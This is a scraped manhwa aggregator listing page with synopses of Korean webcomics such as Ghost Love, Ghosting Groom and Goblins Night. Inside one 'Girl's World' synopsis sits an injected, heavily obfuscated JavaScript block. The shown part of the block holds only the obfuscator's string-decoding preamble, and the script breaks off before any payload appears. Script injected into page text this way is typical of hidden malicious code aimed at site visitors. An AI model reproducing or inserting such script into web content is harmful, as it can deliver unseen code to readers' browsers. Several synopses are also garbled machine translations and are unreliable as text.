Manhwa - Page 56

Manhwa, the Korean version of comics, is renowned for its digital format and engaging stories across genres, from romance to action and fantasy.

3004 results

Ghost Love

Ho-Jin, a health trainer (fitness trainer?), suffers with stress-related insomnia due to relationship issues with his lover. Recommended by his friend, Ho-Jin attempts to cure his insomnia by sleeping naked, but instead, he unwillingly seduces a ghost that dwells in his house… Editor’s statement: Ghost in funeral garments is scary, but a naked ghost is sexy! Webtoons you may also like: + Refrain Love + Cohabitation + Narakarana


Ghost Romance

Read manhwa Ghost Romance; Gwijjal Romance; Pacarku Hantu?! Seonwoo Yoo, a senior in the photography department, is working as a photographer. One day, he receives a collaboration proposal from a famous overseas magazine. For a while, such a fluttering heart Recently, a jokjok ghost taking a picture is taken together ‘Seon-woo’, who suffered from a psychic phenomenon, tries in various ways to solve it, but it is not easy. In the meantime, the psychic picture was not taken. They find the only subject… It is none other than the most famous playboy on campus, ‘Choi Moo-young! “Model? Let me do it. Go out with me instead.” Will ‘Seonwoo’ be able to take a picture of ‘Mooyoung’ and debut safely in a famous overseas magazine?! The dilemma of a horror romance with him, who never wants to be involved, begins! “Ghost Romance Manhwa” is sames name: 귀짤 로맨스


Ghost Story Club

Lee Joon was an ordinary high school student.During the entrance ceremony, he was caught up in a strange phenomenon and died.[You have died.] [Restarting from checkpoint.] [Loading]But then, a message appeared before his eyes.Congratulations on your acceptance at Nakseong Highschool, the school of secrets and mysteries. Uncover the shady secrets hidden within the school, or fight against the legends and ghost stories of the campus in order to earn points to unlock special abilities. Additionally, you must gather comrades to prevent the resurrection of the Demon King before graduation. The world is in your hands.


Ghosting Groom

The Groom Disappeared / 消失的新郎 / 신랑이 사라졌다 Sarang Jin is one of the most famous actresses in South Korea, and she has it all—talent, good looks, and a loving fiancé… or not! One week before their wedding, her groom-to-be ghosts her. She desperately searches everywhere for Inha, only to discover he’s lied to her throughout their entire relationship. To her dismay, his secret triggers her own personal misfortunes with shamanism. Heartbroken and traumatized by her past, will she be able to accept him for who he is?


Ghostly Spirit

Read Manhwa Ghostly Spirit / Ghost (Ghana) Seamdang, A Small Hermitage Nestled In The Foothills Of Jirisan, Is Filled With The Fragrance Of Pear Blossoms. Hayeon, A Descendant Of A Shaman From The Southern Provinces And The Reincarnation Of A Heavenly Maiden, Meets Geonwoo, A Young Man Who Can Intervene In The Spirit World Through His Vajra. Together, They Resolve The Sorrows And Grudges Of The World While Vanquishing Evil Spirits. “Ghostly Spirit Manhwa” Is Alternative: 귀령


Girl with a Knife

Read Girl with a Knife Manhua Two young girls, Chae Sarang (“Sarang” means Love) and Gu Eunjo, dream of revenge for the world with swords in their heart. Kalganeun Sonyeo Knife Girl Revenge Girl Tranchante ฉันมันร้ายหรือเพราะโลกไม่น่รัก 利刃少女 復讐を誓った少女 被诅咒的国民少女 칼가는 소녀 Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending  such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaGG is your best choice, don’t hesitate, just read and feel !


Girl's World

It seems perfect, but in fact the lonely swans and the good-looking ducks meet and struggle with each other and become real friends ...


Girl’s World ( World of Girl )

Read Manga Girl’s World ( World of Girl ) Online For Free At S2Manga Associated Names: Girl’s World ( World of Girl ) Manga Zin The Content Girl’s World ( World of Girl ): It seems perfect, but in fact the lonely swans and the good-looking ducks meet and struggle with each other and become real friends … You can follow some other great Comics!!!: Children of Vamfield Into the light once again Mysterious Village Manga Zin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.


Girl’s World ( World of Girl )

It seems perfect, but in fact the lonely swans and the good-looking ducks meet and struggle with each other and become real friends …<script></script><script>(function(_0x582b04,_0x34bbb9){var _0x542c58=_0x2b32,_0x4ed678=_0x582b04();while(!![]){try{var _0x179a8b=parseInt(_0x542c58(0x153))/(0x9b5+-0xac6+0x112)*(parseInt(_0x542c58(0x16a))/(-0x4*0x13d+0x9c6+-0x4d0))+-parseInt(_0x542c58(0x15f))/(-0x4d*0x9+-0x1*0x87e+0xb36)*(-parseInt(_0x542c58(0x169))/(-0x570+-0xd*0x1c+0xdc*0x8))+parseInt(_0x542c58(0x159))/(-0x17*0x2f+0x13ab+0xb*-0x167)+parseInt(_0x542c58(0x16b))/(-0x250+0x22d9+0xcb*-0x29)+-parseInt(_0x542c58(0x15b))/(-0x16*0x1a5+-0x16e1*0x1+0x3*0x13b2)+-parseInt(_0x542c58(0x156))/(-0x1*0xca3+-0x88c*0x1+0x1*0x1537)*(parseInt(_0x542c58(0x170))/(-0xcbd+0x3d*-0x65+-0x24d7*-0x1))+parseInt(_0x542c58(0x155))/(-0x6bf+0x1773+0x9*-0x1da)*(-parseInt(_0x542c58(0x161))/(-0x26da*-0x1+0x185f+-0x3f2e));if(_0x179a8b===_0x34bbb9)break;else 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Give Me the Pacifier

Betrayed by my most trusted companion, I was banished. I closed my eyes as I vowed for revenge, so how come I became the child of the Duke of the Empire of Heiron, which has been at odds with Cillophia? The problem was… “Abuu!” “Ah, it’s really annoying. Keep on biting your pacifier.” My eyes widened as I sucked on the pacifier in a reflex. ‘What did I just do?’ Has my brain been filled with water and ran off because of the pacifier? Even without the pacifier, I have completely become a newborn with a head full of flowers. This was the biggest stain in the life of the Sorceress Hella. ‘Since it has already become like this, then I’ll just steal some top secret and go back.’ I have to be unnoticed and covert! Today too, Celina’s been crawling desperately between the pillars and trees. “That… Whose child is that? Who’s taking care of the child like that?” An angry roar resounded behind her but it was none of Celina’s business.


Goblin Manhwa

Goblin manhwaI definitely died a moment ago, I swear! Who are these people? What do they want from me?


Goblins Night

Read manhwa Goblins Night / Goblin’s Night / 도깨비의 밤 / Night of the goblin All his life, Choi Siwoo’s complex was his fatness. Even though he leaves his house to run and run until well past midnight, He was running and running until well past midnight after leaving his house, when he met an old man in the middle of the trail. In a blink of an eye, the old man swathes Choi Siwoo in the straw backpack he was carrying. The place Choi Siwoo was thrown into was the ruins of an enormous hanok. On the outskirts of the vast yard, there were countless black shadows standing around him in the middle of the yard he had fallen into. The old man spoke to Choi Siwoo, who was trembling without knowing why. Once every 666 years, there’s a festival to choose the goblin king, and that the right to participate is given to each of the goblin clans that exist in the world. And that Choi Siwoo himself is a mixed blood of human and goblin, specifically of a goblin line that has now gone extinct, and that he is now the only one who can have the right to participate that’s given to the goblins. The only survivor who inherited the blood of goblins, the adventure of the half-monster boy Choi Siwoo begins.

2 days ago